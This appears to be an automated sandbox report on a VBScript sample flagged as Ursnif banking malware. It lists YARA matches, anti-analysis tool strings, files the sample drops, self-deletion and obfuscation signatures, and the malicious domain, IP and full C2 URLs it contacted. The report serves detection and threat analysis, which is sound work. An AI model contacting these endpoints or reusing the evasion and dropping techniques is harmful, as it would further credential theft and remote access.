Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.256675111.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256654196.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256719307.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256727804.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256630765.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256707386.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256693109.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256605868.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.269881981.00000000052A8000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.256675111.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256654196.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256719307.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256727804.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256630765.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256707386.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256693109.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256605868.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.269881981.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 322813 Sample: kj3D6ZRVe22Y.vbs Startdate: 25/11/2020 Architecture: WINDOWS Score: 100 21 Multi AV Scanner detection for domain / URL 2->21 23 Antivirus detection for dropped file 2->23 25 Yara detected  Ursnif 2->25 27 2 other signatures 2->27 6 wscript.exe 2 10 2->6         started        10 iexplore.exe 2 82 2->10         started        process3 file4 15 C:\Users\user\AppData\Local\Temp\odious.ar, PE32 6->15 dropped 17 C:\Users\user\AppData\Local\...\inducible.zip, Zip 6->17 dropped 29 Benign windows process drops PE files 6->29 31 VBScript performs obfuscated calls to suspicious functions 6->31 33 Deletes itself after installation 6->33 35 2 other signatures 6->35 12 iexplore.exe 31 10->12         started        signatures5 process6 dnsIp7 19 api10.laptok.at 47.241.19.44, 49714, 49715, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 12->19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
47.241.19.44
 unknown United States
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC true

Contacted Domains

Name IP Active
api10.laptok.at 47.241.19.44 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://api10.laptok.at/favicon.ico true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://api10.laptok.at/api1/KTYmNZ5bf/XTdcBfNLtmXRsr75Vr0C/OeXHgmDf_2FlOqAKqNq/CPd1ikmNvqsewQ7L42DntW/zgUn8uNyTFsD3/vV_2FLdy/BVjS7xgkGsnIxA2AwWjUVdQ/gjxWUAmiqU/x_2BpyFRJzRkZjwG5/cREwhd_2FA5f/aT7Te41fH7r/hXmziOURNofiS_/2Bhap8rsHpb95XCotYXw_/2BzP9qD2H2eqC7jF/qRJvyGIpta4JULL/h7omqILdZ6v6aRGPZ4/QFITSw1t3/2vFfq4l_0A_0DRdsRckS/8n6v1uSJjqSytugrylp/wmVxUbImOCRXQnwUWTp8Md/ulcl9WEKGwMFb/0NFnCbp true
  • Avira URL Cloud: safe
 unknown